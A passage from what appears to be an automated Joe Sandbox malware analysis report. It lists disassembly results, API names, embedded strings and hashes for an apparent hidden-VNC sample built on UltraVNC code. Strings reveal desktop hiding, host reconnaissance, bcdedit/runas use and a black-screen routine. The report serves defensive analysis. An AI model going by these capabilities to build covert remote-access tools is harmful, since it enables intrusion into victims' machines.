                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastParametersSystem
                                                                                          • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                                          • API String ID: 2777246624-1480653996
                                                                                          • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                                          • Instruction ID: 4dcdbf66247a0d7bc32b354e643889aadbe2b2e99c376903f0aca57837a90b7d
                                                                                          • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                                          • Instruction Fuzzy Hash: 6F517967F2C98385FB50DB68E8547B9A6A9AF75308F404632F80ED35B1EE2CA44DC341
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                                          • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                                          • API String ID: 3443580464-3826360582
                                                                                          • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                                          • Instruction ID: 479f700f91f188c12dd9dcf4ef04d12a9cc1f26a62a17ff6f06611dfefc84234
                                                                                          • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                                          • Instruction Fuzzy Hash: DC613236A25B8699E710CF64E8442E973A0FB58358F401336FA6D87AD9DF7CD219C740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                                          • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                                          • API String ID: 171970310-1760265636
                                                                                          • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                                          • Instruction ID: f11de632b630663953b1aa6d1a2c1271af92be01db0e15079aba01c90c450e5f
                                                                                          • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                                          • Instruction Fuzzy Hash: B5B18162A28A8285EB60CB35D8002B977A4FB147B4F444336FA7EC7AD5DF2CE549C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                                          • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
                                                                                          • API String ID: 171970310-1812746349
                                                                                          • Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                                          • Instruction ID: ed369f4f637d8a2e2553fb65ff9fc7548396cc9b314da00fe9b043feb89e2ff2
                                                                                          • Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                                          • Instruction Fuzzy Hash: 60B18262A2868285EB61CB35D8002B977A4FB247B4F444336FA7EC7AD5DE2CE549C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                                          • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
                                                                                          • API String ID: 171970310-4243357635
                                                                                          • Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                                          • Instruction ID: 6b3919e2aba9dcadce16d3d4efd0ffa5b23ee0b6d07fd69454ab179e47d4d3e9
                                                                                          • Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                                          • Instruction Fuzzy Hash: B8B18262B2868285EB60CB35D8002B977A4FB147B4F444336FA7EC7AD5DE2CE549C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                                          • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
                                                                                          • API String ID: 171970310-3099718995
                                                                                          • Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                                          • Instruction ID: b1849a759ffac8c4fc55641d77c716c62fdc2078cb3545692721df47c00c0f94
                                                                                          • Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                                          • Instruction Fuzzy Hash: 04B18162A2868285EB61CB35D8002B977A4FB247B4F444336FA7EC7AD5DF2CE549C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                                                          • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                                                          • API String ID: 2931780912-670137772
                                                                                          • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                                          • Instruction ID: 0d9b388885e94da4858d7620d3ef74bceb76dd4f64a10a7b56d2f1bf67e1aea3
                                                                                          • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                                          • Instruction Fuzzy Hash: 1D314126B38A4291FA65DF25E5542B5A394EF64BA4F541131FE1E87654DF3CE40EC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
                                                                                          • String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
                                                                                          • API String ID: 3991686958-188493154
                                                                                          • Opcode ID: d47ab58ef9a5c4c1981abf66f5b4630f0cc57bf6471ba11b6532e0924118c186
                                                                                          • Instruction ID: 58f2c86889ed74d889ac5bea1fe34f37925ffa337bc61e6cd529beee9fb0ae16
                                                                                          • Opcode Fuzzy Hash: d47ab58ef9a5c4c1981abf66f5b4630f0cc57bf6471ba11b6532e0924118c186
                                                                                          • Instruction Fuzzy Hash: CCB1CE23B28A8295FB00DB35D8542FC6366EBA4B58F544232EE1EC76E5EE3CD449C340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2853843867-0
                                                                                          • Opcode ID: bd85b3d2716f2062e0e78c163eea9bbb0ad23bc5792617f840c8667f8943287e
                                                                                          • Instruction ID: c4216b009546780f2359d12ab3a3a98ed1228070499f1d5be17a8da1365898ac
                                                                                          • Opcode Fuzzy Hash: bd85b3d2716f2062e0e78c163eea9bbb0ad23bc5792617f840c8667f8943287e
                                                                                          • Instruction Fuzzy Hash: 13E1C337B28A9186EB10CB6AE4446ADB7A4FB98B84F105135FE4E93B54DF3CD449CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D6A39
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D695B
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D6BB2
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D6A0B
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D69A4
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D69F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                                          • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                                          • API String ID: 181403729-1081969236
                                                                                          • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                                          • Instruction ID: 7b8947d942d822cf49c48534d1187930084422f8ceabd3f39a06fd2eadb1e803
                                                                                          • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                                          • Instruction Fuzzy Hash: 89615963B289D141FB18DB68D8552F97794EBA4348F54813AFA9EC7691EE3CD14DC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
                                                                                          • String ID: blackscreen
                                                                                          • API String ID: 1419467151-1520931032
                                                                                          • Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                                          • Instruction ID: 4f0434e0a346d4d53ea20c5f20c50ae305b093099a95a9d8ae74f6f09382715d
                                                                                          • Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                                          • Instruction Fuzzy Hash: 5D81C933F2D68282FB708B14F401A7667AAAFA5744F480635FA5C866E5DF3DE549C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
